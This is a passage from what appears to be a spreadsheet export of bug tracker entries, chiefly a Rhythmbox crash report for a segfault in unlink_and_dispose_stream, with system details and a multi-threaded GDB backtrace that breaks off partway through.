I reported that back on the mailing list:
http://sourceforge.net/mailarchive/message.php?msg_id=13335700
File: http://www.blondeisthenight.com/gst/mjpeg.avi
Testcase C prg: http://www.blondeisthenight.com/gst/pushing.c</t>
  </si>
  <si>
    <t>mdk</t>
  </si>
  <si>
    <t>RHYTHMBOX-529427</t>
  </si>
  <si>
    <t>crash in unlink_and_dispose_stream at rb-player-gst-xfade.c:1317</t>
  </si>
  <si>
    <t xml:space="preserve">Version: 0.11.5
What were you doing when the application crashed?
I have pressed the Play/Pause multimedia key.
Distribution: Mandriva Linux release 2009.0 (Cooker) for i586
Gnome Release: 2.22.0 2008-03-26 (Mandriva)
BugBuddy Version: 2.22.0
System: Linux 2.6.24.4-desktop-1mnb #1 SMP Thu Mar 27 14:34:39 CET 2008 i686
X Vendor: The X.Org Foundation
X Vendor Release: 10400090
Selinux: No
Accessibility: Disabled
GTK+ Theme: Galaxy
Icon Theme: Echo
Memory status: size: 169508864 vsize: 169508864 resident: 66539520 share: 21381120 rss: 66539520 rss_rlim: 4294967295
CPU usage: start_time: 1208895075 rtime: 2742 utime: 2504 stime: 238 cutime:0 cstime: 1 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/rhythmbox'
[?1034hUsing host libthread_db library /lib/i686/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1239061840 (LWP 10888)]
[New Thread -1319109744 (LWP 10923)]
[New Thread -1361073264 (LWP 10922)]
[New Thread -1431331952 (LWP 10921)]
[New Thread -1422939248 (LWP 10920)]
[New Thread -1403528304 (LWP 10912)]
[New Thread -1394644080 (LWP 10911)]
[New Thread -1264272496 (LWP 10894)]
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb763d36b in waitpid () from /lib/i686/libpthread.so.0
#2  0xb6a2642b in IA__g_spawn_sync (working_directory=0x0 argv=0x904f378 
    envp=0x0 flags= child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x81c8098)
    at gspawn.c:374
#3  0xb6a26774 in IA__g_spawn_command_line_sync (
    command_line=0x9388078 bug-buddy --appname=\rhythmbox\ --pid=10888 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x81c8098)
    at gspawn.c:682
#4  0xb60d6080 in run_bug_buddy (appname=0x80fdc48 rhythmbox 
    pid= minidump_path=)
    at gnome-breakpad.cc:213
#5  0xb60d657a in check_if_gdb (callback_context=0x0) at gnome-breakpad.cc:283
#6  0xb60d6893 in google_breakpad::ExceptionHandler::InternalWriteMinidump (
    this=0xb60df4c0 signo=11 sighandler_ebp=136090888 sig_ctx=0x81c94f4)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:226
#7  0xb60d6e7e in google_breakpad::ExceptionHandler::HandleException (signo=11)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:197
#8  
#9  0xb7ea010b in unlink_and_dispose_stream (player=0x8270000 
    stream=0x8be08e0) at rb-player-gst-xfade.c:1317
#10 0xb7ea5a71 in rb_player_gst_x005F_xfade_close (iplayer=0x8270000 uri=0x0 
    error=0xbffcd3bc) at rb-player-gst-xfade.c:3014
#11 0xb7e97e43 in rb_player_close (player=0x8270000 uri=0x0 error=0xbffcd3bc)
    at rb-player.c:265
#12 0x0806c3ef in rb_shell_player_stop (player=0x826e038)
    at rb-shell-player.c:2843
#13 0xb3cd7e59 in media_player_key_pressed (proxy=0x8db8598 
    application= key= 
    plugin=0x8ce74e0) at rb-mmkeys-plugin.c:105
#14 0xb7eb0d59 in rb_marshal_VOID__STRING_STRING (closure=0x8ce7be0 
    return_value=0x0 n_param_values=3 param_values=0x91b4c70 
    invocation_hint=0xbffcd65c marshal_data=0xb3cd7d70) at rb-marshal.c:1476
#15 0xb785bbce in ?? () from /usr/lib/libdbus-glib-1.so.2
#16 0xb6bcdf9d in IA__g_closure_invoke (closure=0x8ce7be0 return_value=0x0 
    n_param_values=3 param_values=0xbffcd754 invocation_hint=0xbffcd65c)
    at gclosure.c:490
#17 0xb6be22c0 in signal_emit_unlocked_R (node=0x81d2ae8 detail=2822 
    instance=0x8db8598 emission_return=0x0 instance_and_params=0xbffcd754)
    at gsignal.c:2440
#18 0xb6be3f0e in IA__g_signal_emit_valist (instance=0x8db8598 signal_id=42 
    detail=2822 
    var_args=0xbffcd994 \230@Â¬\bÃ´OXÂ·Â²Ã¹UÂ·\230@Â¬\bÂ³\023Ã—Â¶xÃšÃ¼\001\230jÂ§Â¶Ã€jÂ§Â¶\030Â¨\037\bÂ°l\035\b\230\205Ã›\bÂ³\023Ã—Â¶Â¸Â´\027\tÂ¸Â´\027\t\230Ã’Ã—Â¶Â°l\035\b`Â­Â¡\b\006\v)
    at gsignal.c:2199
#19 0xb6be424b in IA__g_signal_emit (instance=0x8db8598 signal_id=42 
    detail=2822) at gsignal.c:2243
#20 0xb785cbe3 in ?? () from /usr/lib/libdbus-glib-1.so.2
#21 0xb7553c92 in dbus_connection_dispatch () from /lib/libdbus-1.so.3
#22 0xb7854f2d in ?? () from /usr/lib/libdbus-glib-1.so.2
#23 0xb69efa50 in IA__g_main_context_dispatch (context=0x81c8d88)
    at gmain.c:2009
#24 0xb69f2d25 in g_main_context_iterate (context=0x81c8d88 block=1 
    dispatch=1 self=0x80ea028) at gmain.c:2642
#25 0xb69f3068 in IA__g_main_loop_run (loop=0x8995a30) at gmain.c:2850
#26 0xb70462bf in IA__gtk_main () at gtkmain.c:1163
#27 0x08060318 in main (argc=) at main.c:327
Thread 8 (Thread -1264272496 (LWP 10894)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68d0fa7 in poll () from /lib/i686/libc.so.6
	nftw_arr = {0 1 2 3 4 5 6}
	ftw_arr = {0 1 2 3 0 1 3}
#2  0xb757204b in ?? () from /lib/libdbus-1.so.3
No symbol table info available.
#3  0xb756a33b in ?? () from /lib/libdbus-1.so.3
No symbol table info available.
#4  0xb756860d in ?? () from /lib/libdbus-1.so.3
No symbol table info available.
#5  0xb7553504 in ?? () from /lib/libdbus-1.so.3
No symbol table info available.
#6  0xb755564d in ?? () from /lib/libdbus-1.so.3
No symbol table info available.
#7  0xb7562a8f in dbus_pending_call_block () from /lib/libdbus-1.so.3
No symbol table info available.
#8  0xb7554941 in dbus_connection_send_with_reply_and_block ()
   from /lib/libdbus-1.so.3
No symbol table info available.
#9  0xb7e62890 in rb_metadata_load (md=0x92bc600 
    uri=0x92f8b44 file:///mnt/removable/musik/Archiv/Entombed%20-%20Same%20Difference/00-entombed-same_difference-1998-int-gore.nfo error=0x90e4d98)
    at rb-metadata-dbus-client.c:376
	message = (DBusMessage *) 0x92be348
	response = (DBusMessage *) 0x0
	iter = {dummy1 = 0xb6beac00 dummy2 = 0x825bee8 dummy3 = 151775832 
  dummy4 = 151932288 dummy5 = -1229107421 dummy6 = 136691432 dummy7 = 0 
  dummy8 = -1264274680 dummy9 = 151775832 dummy10 = 10894 
  dummy11 = 150633032 pad1 = 16777224 pad2 = -1209204080 pad3 = 0x825bee8}
	dbus_error = {name = 0x0 message = 0x0 dummy1 = 0 dummy2 = 0 
  dummy3 = 0 dummy4 = 0 dummy5 = 0 padding1 = 0x0}
	ok = 
	fake_error = (GError *) 0x0
	__FUNCTION__ = rb_metadata_load
#10 0xb7e8035a in action_thread_main (db=0x825c028) at rhythmdb.c:2351
	action = (RhythmDBAction *) 0x86aad58
	result = 
	__FUNCTION__ = action_thread_main
	__PRETTY_FUNCTION__ = action_thread_main
#11 0xb6a17f04 in g_thread_create_proxy (data=0x86de688) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#12 0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#13 0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 7 (Thread -1394644080 (LWP 10911)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76394e5 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb6c6d08d in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#3  0xb6a19bc1 in g_thread_pool_thread_proxy (data=0x92a9338)
    at gthreadpool.c:265
	task = (gpointer) 0x86e6a50
	pool = (GRealThreadPool *) 0x92a9338
#4  0xb6a17f04 in g_thread_create_proxy (data=0x92a8ae8) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#5  0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#6  0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 6 (Thread -1403528304 (LWP 10912)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76394e5 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb6c6d08d in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#3  0xb6a19bc1 in g_thread_pool_thread_proxy (data=0x92a9338)
    at gthreadpool.c:265
	task = (gpointer) 0x86e68c0
	pool = (GRealThreadPool *) 0x92a9338
#4  0xb6a17f04 in g_thread_create_proxy (data=0x8e19240) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#5  0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#6  0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 5 (Thread -1422939248 (LWP 10920)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb68d0fa7 in poll () from /lib/i686/libc.so.6
	nftw_arr = {0 1 2 3 4 5 6}
	ftw_arr = {0 1 2 3 0 1 3}
#2  0xabd47916 in ?? () from /usr/lib/libpulse.so.0
No symbol table info available.
#3  0xabd3a2ef in pa_mainloop_poll () from /usr/lib/libpulse.so.0
No symbol table info available.
#4  0xabd3b955 in pa_mainloop_iterate () from /usr/lib/libpulse.so.0
No symbol table info available.
#5  0xabd3ba34 in pa_mainloop_run () from /usr/lib/libpulse.so.0
No symbol table info available.
#6  0xabd4780e in ?? () from /usr/lib/libpulse.so.0
No symbol table info available.
#7  0xabd690ca in ?? () from /usr/lib/libpulse.so.0
No symbol table info available.
#8  0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#9  0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 4 (Thread -1431331952 (LWP 10921)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76394e5 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb17a2fdc in ?? () from /usr/lib/libgstaudio-0.10.so.0
No symbol table info available.
#3  0xb17a4584 in gst_ring_buffer_commit_full ()
   from /usr/lib/libgstaudio-0.10.so.0
No symbol table info available.
#4  0xb179a06e in ?? () from /usr/lib/libgstaudio-0.10.so.0
No symbol table info available.
#5  0xb6cc4375 in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#6  0xb6cc5b57 in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#7  0xb6cc61c0 in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#8  0xb6cc680a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#9  0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#10 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#11 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#12 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#13 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#14 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#15 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#16 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#17 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#18 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#19 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#20 0xb17de09d in ?? () from /usr/lib/gstreamer-0.10/libgstcoreelements.so
No symbol table info available.
#21 0xb6c6cf4c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#22 0xb6a19bc1 in g_thread_pool_thread_proxy (data=0x92a9338)
    at gthreadpool.c:265
	task = (gpointer) 0xb2c08508
	pool = (GRealThreadPool *) 0x92a9338
#23 0xb6a17f04 in g_thread_create_proxy (data=0x8fe3128) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#24 0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#25 0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 3 (Thread -1361073264 (LWP 10922)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76394e5 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb17dfd7d in ?? () from /usr/lib/gstreamer-0.10/libgstcoreelements.so
No symbol table info available.
#3  0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#4  0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#5  0xb17e1611 in ?? () from /usr/lib/gstreamer-0.10/libgstcoreelements.so
No symbol table info available.
#6  0xb17e1b96 in ?? () from /usr/lib/gstreamer-0.10/libgstcoreelements.so
No symbol table info available.
#7  0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#8  0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#9  0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#10 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#11 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#12 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#13 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#14 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#15 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#16 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#17 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#18 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#19 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#20 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#21 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#22 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#23 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#24 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#25 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#26 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#27 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#28 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#29 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#30 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#31 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#32 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#33 0xb331a3a6 in ?? () from /usr/lib/gstreamer-0.10/libgstadder.so
No symbol table info available.
#34 0xb6cd7c37 in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#35 0xb6cd8589 in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#36 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#37 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#38 0xb6c42dc9 in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#39 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#40 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#41 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#42 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#43 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#44 0xb6cd578a in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#45 0xb6c50b1c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#46 0xb6c511c7 in gst_pad_push () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#47 0xb6ccfd8f in ?? () from /usr/lib/libgstbase-0.10.so.0
No symbol table info available.
#48 0xb6c6cf4c in ?? () from /usr/lib/libgstreamer-0.10.so.0
No symbol table info available.
#49 0xb6a19bc1 in g_thread_pool_thread_proxy (data=0x92a9338)
    at gthreadpool.c:265
	task = (gpointer) 0x9186510
	pool = (GRealThreadPool *) 0x92a9338
#50 0xb6a17f04 in g_thread_create_proxy (data=0x8fd4fa8) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#51 0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#52 0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 2 (Thread -1319109744 (LWP 10923)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb76394e5 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xabd6807b in ?? () from /usr/lib/libpulse.so.0
No symbol table info available.
#3  0xabd47ae5 in pa_threaded_mainloop_wait () from /usr/lib/libpulse.so.0
No symbol table info available.
#4  0xb1738c74 in ?? () from /usr/lib/gstreamer-0.10/libgstpulse.so
No symbol table info available.
#5  0xb1796b33 in ?? () from /usr/lib/libgstaudio-0.10.so.0
No symbol table info available.
#6  0xb6a17f04 in g_thread_create_proxy (data=0x92b8138) at gthread.c:635
	__PRETTY_FUNCTION__ = g_thread_create_proxy
#7  0xb76354e2 in start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
#8  0xb68db47e in clone () from /lib/i686/libc.so.6
	__elf_set___libc_subfreeres_element_fstab_free__ = (
    const void *) 0xb6919ef0
	fstab_state = {fs_fp = 0x0 fs_buffer = 0x0 fs_mntres = {
    mnt_fsname = 0x0 mnt_dir = 0x0 mnt_type = 0x0 mnt_opts = 0x0 
    mnt_freq = 0 mnt_passno = 0} fs_ret = {fs_spec = 0x0 fs_file = 0x0 
    fs_vfstype = 0x0 fs_mntops = 0x0 fs_type = 0x0 fs_freq = 0 
    fs_passno = 0}}
Thread 1 (Thread -1239061840 (LWP 10888)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb763d36b in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0xb6a2642b in IA__g_spawn_sync (working_directory=0x0 argv=0x904f378 
    envp=0x0 flags= child_setup=0 user_data=0x0 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x81c8098)
    at gspawn.c:374
	outpipe = -1
	errpipe = -1
	pid = 10931
	fds = {__fds_bits = {0 6 0 8 135176920 0 160 0 -1230543144 0 
    2 151319416 -1230969169 8 144259032 4 -1230981695 144259032 
    -1231063088 0 1708282130 -1232660159 0 -1299402656 16 939524097 
    136085512 136085508 3 0 8864272 144259032}}
	ret = 
	outstr = (GString *) 0x0
	errstr = (GString *) 0x0
	failed = 0
	status = 
	__PRETTY_FUNCTION__ = IA__g_spawn_sync
#3  0xb6a26774 in IA__g_spawn_command_line_sync (
    command_line=0x9388078 bug-buddy --appname=\rhythmbox\ --pid=10888 
    standard_output=0x0 standard_error=0x0 exit_status=0x0 error=0x81c8098)
    at gspawn.c:682
	retval = 0
	argv = (gchar **) 0x904f378
	__PRETTY_FUNCTION__ = IA__g_spawn_command_line_sync
#4  0xb60d6080 in run_bug_buddy (appname=0x80fdc48 rhythmbox 
    pid= minidump_path=)
    at gnome-breakpad.cc:213
	exec_str = (
    gchar *) 0x9388078 bug-buddy --appname=\rhythmbox\ --pid=10888
	res = 
	error = (GError *) 0x0
#5  0xb60d657a in check_if_gdb (callback_context=0x0) at gnome-breakpad.cc:283
	mypath = /usr/bin/rhythmbox '\0' 
	gdb = (gchar *) 0x94b0a90 /usr/bin/gdb
	appname = (gchar *) 0x80fdc48 rhythmbox
	pid = 10888
#6  0xb60d6893 in google_breakpad::ExceptionHandler::InternalWriteMinidump (
    this=0xb60df4c0 signo=11 sighandler_ebp=136090888 sig_ctx=0x81c94f4)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:226
	guid = {data1 = 3054367936 data2 = 2272 data3 = 2238 
  data4 = \b\225\034\bÃ° Ã°Â·}
	success = 
	guid_str = \000\001\000\000\000\005\000\000\000\000\000\000\000\f5\rÂ¶\000 \rÂ¶Ã„Ã“\000\000\005\000\000\000/\rÂ¶Â°Ã±\rÂ¶
#7  0xb60d6e7e in google_breakpad::ExceptionHandler::HandleException (signo=11)
    at ../google-breakpad/src/client/linux/handler/exception_handler.cc:197
	current_ebp = 136090888
	current_handler = (google_breakpad::ExceptionHandler *) 0xb60df4c0
	sig_ctx = (sigcontext *) 0x0
#8  
No symbol table info available.
#9  0xb7ea010b in unlink_and_dispose_stream (player=0x8270000 
    stream=0x8be08e0) at rb-player-gst-xfade.c:1317
	sr = 
	__FUNCTION__ = unlink_and_dispose_stream
#10 0xb7ea5a71 in rb_player_gst_x005F_xfade_close (iplayer=0x8270000 uri=0x0 
    error=0xbffcd3bc) at rb-player-gst-xfade.c:3014
	stream = (RBXFadeStream *) 0x8be08e0
	list = (GList *) 0xb28034c0
	l = (GList *) 0xb28034c0
	player = (RBPlayerGstXFade *) 0x8270000
	ret = 
	__FUNCTION__ = rb_player_gst_x005F_xfade_close
#11 0xb7e97e43 in rb_player_close (player=0x8270000 uri=0x0 error=0xbffcd3bc)
    at rb-player.c:265
No locals.
#12 0x0806c3ef in rb_shell_player_stop (player=0x826e038)
    at rb-shell-player.c:2843
	error = (GError *) 0x0
	__FUNCTION__ = rb_shell_player_stop
	__PRETTY_FUNCTION__ = rb_shell_player_stop
#13 0xb3cd7e59 in media_player_key_pressed (proxy=0x8db8598 
    application= key= 
    plugin=0x8ce74e0) at rb-mmkeys-plugin.c:105
	__FUNCTION__ = media_player_key_pressed
#14 0xb7eb0d59 in rb_marshal_VOID__STRING_STRING (closure=0x8ce7be0 
    return_value=0x0 n_param_values=3 param_values=0x91b4c70 
    invocation_hint=0xbffcd65c marshal_data=0xb3cd7d70) at rb-marshal.c:1476
	data1 = (gpointer) 0x8db8598
	data2 = 
	__PRETTY_FUNCTION__ = rb_marshal_VOID__STRING_STRING
#15 0xb785bbce in ?? () from /usr/lib/libdbus-glib-1.so.2
No symbol table info available.
#16 0xb6bcdf9d in IA__g_closure_invoke (closure=0x8ce7be0 return_value=0x0 
    n_param_values=3 param_values=0xbffcd754 invocation_hint=0xbffcd65c)
    at gclosure.c:490
	marshal = (GClosureMarshal) 0xb785ba50
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#17 0xb6be22c0 in signal_emit_unlocked_R (node=0x81d2ae8 detail=2822 
    instance=0x8db8598 emission_return=0x0 instance_and_params=0xbffcd754)
    at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x8ce7500
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x8db8598 ihint = {signal_id = 42 
    detail = 2822 run_type = G_SIGNAL_RUN_FIRST} state = EMISSION_RUN 
  chain_type = 4}
	class_closure = (GClosure *) 0x0
	handler_list = (Handler *) 0x8ce7500
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 42
	max_sequential_handler_number = 4432
	return_value_altered = 0
#18 0xb6be3f0e in IA__g_signal_emit_valist (instance=0x8db8598 signal_id=42 
    detail=2822 
    var_args=0xbffcd994 \230@Â¬\bÃ´OXÂ·Â²Ã¹UÂ·\230@Â¬\bÂ³\023Ã—Â¶xÃšÃ¼\001\230jÂ§Â¶Ã€jÂ§Â¶\030Â¨\037\bÂ°l\035\b\230\205Ã›\bÂ³\023Ã—Â¶Â¸Â´\027\tÂ¸Â´\027\t\230Ã’Ã—Â¶Â°l\035\b`Â­Â¡\b\006\v)
    at gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1232642498 v_long = -1232642498 
    v_int64 = 277940231742 v_double = 1.3732072010087696e-312 
    v_pointer = 0xb6875e3e} {v_int = -1218206971 v_long = -1218206971 
    v_int64 = -5279427741955677435 v_double = -4.8528445792574872e-45 
    v_pointer = 0xb763a305} {v_int = 34 v_long = 34 
    v_int64 = 624945263718432802 v_double = 6.8450512202470252e-267 
    v_pointer = 0x22} {v_int = 16 v_long = 16 v_int64 = 4294967312 
    v_double = 2.1219957988703226e-314 v_pointer = 0x10} {v_int = 2048 
    v_long = 2048 v_int64 = -5285142559797016576 
    v_double = -2.0495508171112154e-45 v_pointer = 0x800} {
    v_int = -1230543144 v_long = -1230543144 v_int64 = 3064424152 
    v_double = 1.5140266977893943e-314 v_pointer = 0xb6a766d8} {v_int = 16 
    v_long = 16 v_int64 = -4612572877634404336 
